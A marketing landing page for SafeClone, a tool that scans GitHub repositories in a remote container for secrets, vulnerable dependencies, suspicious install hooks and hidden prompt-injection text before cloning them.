SafeClone scans any GitHub repo for hardcoded secrets, vulnerable dependencies, and dangerous install scripts — before a single line of code touches your machine.
Powered by trusted security tools
SafeClone does all the heavy lifting on a remote server. Your machine stays clean the entire time.
Run safeclone <url> from your terminal. That's the entire workflow — no config, no project setup, no dependencies.
Our server spins up an isolated Docker container, clones the repo inside it, and runs all three scanners in parallel. Nothing executes on your machine.
Get a clear verdict in seconds. Safe repos clone automatically. Dangerous ones show you exactly what was found and prompt you before proceeding.
Every scan runs all four checks simultaneously so you get a complete picture in one go.
Runs TruffleHog against the cloned filesystem. Only verified, active credentials are reported — no noise from already-rotated keys or test fixtures.
Queries the OSV.dev database with exact version pinning across 10 package ecosystems. Only CVEs that affect the specific version declared in the repo are flagged.
Statically analyzes install-time hooks in package manifests for patterns used in supply chain attacks — before any code runs anywhere.
Scans all markdown files for hidden instructions designed to hijack AI coding assistants — Copilot, Cursor, Claude — when they read the repo. Priority targets include CLAUDE.md, .cursorrules, and AGENTS.md.
No secrets, no vulnerable deps, no dangerous scripts detected. SafeClone proceeds with git clone without prompting.
Vulnerable dependencies or suspicious scripts found, but no active secrets. You see the full report and choose whether to proceed.
Active, verified secrets detected in the repository. SafeClone stops and shows you exactly what was found. Use --force to override.
One binary. No runtime dependencies. No configuration needed.